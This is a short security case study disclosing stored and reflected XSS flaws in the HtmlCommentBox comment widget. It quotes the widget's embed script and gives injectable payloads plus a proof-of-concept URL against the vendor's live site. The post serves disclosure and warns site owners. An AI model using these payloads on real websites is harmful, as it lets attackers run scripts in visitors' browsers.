This is a small case study, where my aim is to explain why you shouldn't use untrusted third party scripts on your website. Htmlcommentbox is a third part script that could be embedded into any webpage would bring a place where users can comment and interact with each, I feel it is poorly coded from both user's perspective and security perspective as it could introduce lots of spam in your website.
Let's talk about what else could it do else than introducing spam from security perspective. We [Me and Pepe Vila] have found two attack vectors with the HtmlCommentBox as Does not sanitise the user input's properly resulting in a stored xss and also a reflected xss, which obviously leaves wide variety of attack vectors from the attacker's perspective.
Stored XSS POC
The POC is very simple, Seems like that you can inject any thing as long as you don't close the tag:
Example:
<img src=x onerror=prompt(0);
<iframe/onload=prompt(0);
<svg/onload=prompt(0);
Let's see a demonstration of this on their live website where they themselves have hosted their htmlcommentbox making their website vulnerable to the stored XSS too.
The following page is where, users can request for additional features, as you can clearly see from the picture that it is using the htmlcommentbox. All, i did was to inject the following payload into the messagebox:
<img src=x onerror=prompt(0);
Second Issue - Reflected XSS
Well, this is not it, We have more for you, Implementing HTMLCommentBox also makes your website vulnerable to a non persistent xss.
Let's take a closer look at their script that users would implement on their page:
Let's take a closer look at their script that users would implement on their page:
(function(){var s=document.createElement("script"),l=(""+window.location || hcb_user.PAGE),h="//www.htmlcommentbox.com"; s.setAttribute("type","text/ javascript");s.setAttribute(" src",h+"/jread?page="+ encodeURIComponent(l).replace( "+","%2B")+"&opts=16862&num= 10");if(typeof s!="undefined")document.getElementsByTagName( "head")[0].appendChild(s);})()
If you closely look at the window.location portion, you would find that encodeURIComponent allows single quotes. If we just replace window.location with our alert statement, it would triggered under the script context, Hence making the website vulnerable to a xss. And the /jread?page='-prompt(1)-'&opt=x&num=y, this would be reflected under the page context.
So the POC would be as follows:
http://www.htmlcommentbox.com/?'-prompt(1)-'
Again, I am very thankful to @pepevila for pointing the second issue.
The lesson to be learned is business that rely on or use third part scripts on their website, Should use well known scripts and make sure that they are not vulnerable to any attacks or atleast research if their haven't been any issues with them in past, because often times these third party scripts are responsible for the security breaches.
Take an example from this case study, Where using a third party script to host comments introduced High risk security vulnerabilities. Any one using this script on their websites are requested to immediately remove it.
The lesson to be learned is business that rely on or use third part scripts on their website, Should use well known scripts and make sure that they are not vulnerable to any attacks or atleast research if their haven't been any issues with them in past, because often times these third party scripts are responsible for the security breaches.
Take an example from this case study, Where using a third party script to host comments introduced High risk security vulnerabilities. Any one using this script on their websites are requested to immediately remove it.